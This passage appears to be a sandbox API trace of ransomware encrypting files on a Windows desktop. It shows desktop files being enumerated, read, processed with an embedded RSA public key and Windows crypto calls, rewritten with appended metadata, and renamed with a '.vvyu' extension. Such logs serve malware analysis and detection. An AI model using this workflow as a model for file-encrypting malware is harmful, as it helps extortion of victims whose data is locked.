[0192.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.759] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xc183, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xc183, lpOverlapped=0x0) returned 1 [0192.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.760] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc188, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.760] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.761] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.762] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.762] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.762] CloseHandle (hObject=0x568) returned 1 [0192.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9ea68 [0192.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.764] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\NWy04.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\nwy04.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\NWy04.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\nwy04.bmp.vvyu")) returned 1 [0192.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.765] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.771] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53478d0, ftCreationTime.dwHighDateTime=0x1d8a234, ftLastAccessTime.dwLowDateTime=0xc9a54260, ftLastAccessTime.dwHighDateTime=0x1d8a294, ftLastWriteTime.dwLowDateTime=0xc9a54260, ftLastWriteTime.dwHighDateTime=0x1d8a294, nFileSizeHigh=0x0, nFileSizeLow=0x10cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfbL.flv", cAlternateFileName="")) returned 1 [0192.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95458 [0192.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95458 | out: hHeap=0x620000) returned 1 [0192.772] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\OfbL.flv") returned=".flv" [0192.772] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OfbL.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ofbl.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.773] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=68814) returned 1 [0192.773] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.775] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x10ca8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.775] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.779] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.779] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x10cce, lpOverlapped=0x0) returned 1 [0192.780] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.780] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.780] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.780] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.781] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.781] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.781] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.781] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.781] GetLastError () returned 0x0 [0192.782] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.782] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.782] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.782] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.782] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10cd0) returned 0x2ea79b0 [0192.783] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95458 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e954a0 [0192.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.784] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936c0 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c936a8 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.787] GetCurrentThreadId () returned 0x66c [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e890 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.787] GetCurrentThreadId () returned 0x66c [0192.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936c0 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93720 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93738 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936d8 [0192.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936a8 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: 